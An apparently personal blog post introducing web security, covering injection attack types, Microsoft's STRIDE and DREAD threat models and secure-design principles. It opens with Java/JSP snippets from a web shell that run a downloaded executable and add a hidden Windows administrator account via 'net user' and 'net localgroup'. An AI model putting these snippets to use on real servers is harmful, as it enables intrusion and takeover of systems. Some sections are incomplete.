alk In Web Security(保险世界观): Devleping a Secure Wesite
Writer:BYSocket(泥沙砖瓦浆木匠)
-
微博:BYSocket
-
豆瓣:BYSocket
Reprint it anywhere u want.
Why to write about Web Security?
A java file can hack your server.One JSP can download any file. How to do this?
1. Write a JSP and upload to the server.
2. Use JSP to download any bug by HttpClient.
3. Open the virus and get/add the infomation of admin or datas
We can see some from what I write.Its easy but useful:
|
1
2
3
4
5
6
7
8
9
10
11
|
<fontsize="4"face="宋体"> if(!IsWindows())
{
Process process = Runtime.getRuntime().exec("chmod 777 "+strExeFile);
if (process.waitFor() != 0)
out.println("FAIL ---> when open file");
}
Process process = Runtime.getRuntime().exec(strExeFile);
if (process.waitFor() == 0)
out.println("SUCCESS ---> When open the file");</font>
|
Use Java to open the bug.And then get an administrator user.
|
1
2
3
4
5
6
7
8
9
10
11
12
|
if(IsWindows())
{
String execStr = "cmd.exe /C " + "net user " + strAcc + " " + strPwd + " /add";
Process process = Runtime.getRuntime().exec(execStr);
if (process.waitFor() == 0)
{
Runtime.getRuntime().exec("cmd.exe /C " + "net localgroup administrators " + strAcc + " /add");
}
else
out.print("FAIL ---> when " + execStr);
}
|
Its about how to use java to get add an administrator user.
Here are some injections that we can see anywhere.So we need Learn the Web Security. First we can learn from the Web history.
Some of Web Security needed to know
Since the environment getting worse,like Haze.So many persons wear Masks when going out.Just like the way to protect ourselves ,we trust the Masks. Its the same as web security.
Note:’Web Security is based on the trust,every way to design on Web Security is also based on the trusts.’
Many web attacks like Haze:
1. XSS
2. CRLF Injection
3. X-PATH Injection
4. HTML Injection
5. JavaScript Injection
XSS Development:
So there is a question:’How to analysis the web security of software or project?’
STRIDE (security) DREAD by Microsoft
STRIDE
STRIDE is a system developed by Microsoft for thinking about computer security threats.The threat categories are:
1. Spoofing of user identity
2. Tampering
3. Repudiation
4. Infomation disclosure
5. Denial of Service
6. Elevation of privilege
DREAD
The problem with a simplistic rating system is that team members usually will not agree on ratings. To help solve this, add new dimensions that help determine what the impact of a security threat really means. At Microsoft, the DREAD model is used to help calculate risk. By using the DREAD model, you arrive at the risk rating for a given threat by asking the following questions:
1. Damage potential: How great is the damage if the vulnerability is exploited?
2. Reproducibility: How easy is it to reproduce the attack?
3. Exploitability: How easy is it to launch an attack?
4. Affected users: As a rough percentage, how many users are affected?
5. Discoverability: How easy is it to find the vulnerability?
So after these categories,a good way to design on Web Security has some features:
1. Solve problem in effect
2. Good experience for users
3. Low coupling
4. Easy to extend and upgrade
How to Devlep a Secure WebSite
Note: ‘ Security is a normal subject and a poised art.’
1. Secure By Default
Its also the security of users.We can create The White List and The Black List and limits of user operation.
2. Defense in Depth
Defense in Depth is a crucial model for implementing effective information security. The details of such a diverse model are what make it successful, I have put together a series of eight webcasts on this topic. Here are 7 levels:
3. Quarantine between Data and Demo
4. Uncertainly of unpredictability
The paramters may be easy to guess.So let them be hard to guess.
Think in Web Security
Like a bucket of water, we trust the bucket and water.Its the Security.When the bucket has the chemistry-poison,the security will be broken.
Note:‘Open Free Share’
G night~
Writer:BYSocket(泥沙砖瓦浆木匠)
-
微博:BYSocket
-
豆瓣:BYSocket
Reprint it anywhere u want.